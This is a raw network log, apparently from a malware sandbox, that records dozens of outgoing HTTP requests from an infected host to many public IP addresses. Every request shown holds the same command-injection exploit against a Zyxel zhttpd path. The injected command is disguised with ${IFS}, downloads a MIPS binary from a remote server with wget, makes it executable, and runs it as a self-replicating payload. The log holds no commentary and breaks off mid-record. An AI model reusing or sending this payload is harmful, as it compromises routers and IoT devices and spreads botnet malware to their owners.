                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:21.757148981 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3431192.168.2.23400362.56.41.89443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:21.757174015 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3432192.168.2.2351850213.70.165.242443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:21.757239103 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3433192.168.2.2336512176.135.78.150443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:21.757253885 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3434192.168.2.2345520117.43.15.72443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:21.757271051 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3435192.168.2.233823883.27.108.10443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:21.757292986 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3436192.168.2.2342116193.0.0.56443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:21.757330894 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3437192.168.2.2359624183.45.176.229443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:21.757354021 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3438192.168.2.2351252196.229.6.238443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:21.757379055 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3439192.168.2.2347774170.180.39.196443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:21.757390976 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3440192.168.2.2359772169.59.36.87443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:21.757410049 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3441192.168.2.2345768146.209.19.97443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:21.757431030 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3442192.168.2.235902897.98.173.168443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:21.757453918 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3443192.168.2.2352278213.59.115.178443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:21.757462025 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3444192.168.2.2356672199.232.254.18443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:21.757519007 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3445192.168.2.2359384159.32.135.216443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:21.757533073 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3446192.168.2.233876475.106.216.57443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:21.757559061 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3447192.168.2.233870060.29.123.8443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:21.757586956 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3448192.168.2.233641849.244.250.192443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:21.757628918 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3449192.168.2.2342358117.166.163.159443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:21.757627964 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3450192.168.2.2333226144.122.54.243443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:21.757692099 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3451192.168.2.2348738118.218.192.109443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:21.757730961 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3452192.168.2.235402225.68.197.27443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:21.757761955 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3453192.168.2.236031689.35.172.250443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:21.757798910 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3454192.168.2.235385861.38.157.4443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:21.757819891 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3455192.168.2.235633457.197.91.110443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:21.757846117 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3456192.168.2.235708844.117.62.110443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:21.757872105 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3457192.168.2.2332974223.60.13.83443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:21.757905006 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3458192.168.2.2351632151.88.62.83443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:21.757935047 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3459192.168.2.234276446.206.214.98443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:21.757951975 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3460192.168.2.234243624.163.250.180443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:21.757997990 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3461192.168.2.2355774107.132.43.36443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:21.758018017 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3462192.168.2.2345576174.41.146.68443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:21.758039951 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3463192.168.2.233944445.24.243.213443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:21.758066893 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3464192.168.2.2352550137.235.137.102443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:21.758099079 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3465192.168.2.235443427.80.90.210443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:21.758100986 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3466192.168.2.234579492.18.142.62443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:21.758136988 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3467192.168.2.233346262.222.201.206443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:21.758173943 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3468192.168.2.233898845.104.130.229443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:21.758193016 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3469192.168.2.2342028169.248.93.11443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:21.758197069 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3470192.168.2.234967484.233.24.65443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:21.758228064 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3471192.168.2.2335904221.45.132.68443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:21.758243084 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3472192.168.2.2347304220.5.174.37443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:21.758279085 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3473192.168.2.233969845.119.232.47443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:21.758294106 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3474192.168.2.2334362122.178.79.233443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:21.758310080 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3475192.168.2.235165467.103.62.132443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:21.758327961 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3476192.168.2.2344446182.127.53.152443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:21.758337975 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3477192.168.2.2352830101.135.139.23443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:21.758366108 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3478192.168.2.2337262150.141.9.35443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:21.758373976 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3479192.168.2.234722885.225.138.152443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:21.758398056 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3480192.168.2.2342740161.122.124.73443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:21.758414030 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3481192.168.2.2348648163.4.23.117443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:21.758434057 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3482192.168.2.2350432216.194.219.179443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:21.758476973 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3483192.168.2.2350486122.19.41.0443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:21.758538961 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3484192.168.2.233991677.253.138.11443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:21.758554935 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3485192.168.2.2335142152.46.130.205443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:21.758583069 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3486192.168.2.2335316168.131.8.38443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:21.758584976 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3487192.168.2.234492267.191.6.182443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:21.758606911 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3488192.168.2.2353598125.150.232.146443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:21.758636951 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3489192.168.2.235905446.84.111.147443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:21.758681059 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3490192.168.2.2350848197.80.43.221443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:21.758711100 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3491192.168.2.2349386116.167.204.186443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:21.758711100 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3492192.168.2.2346110146.121.225.174443
                                                TimestampBytes transferredDirectionData
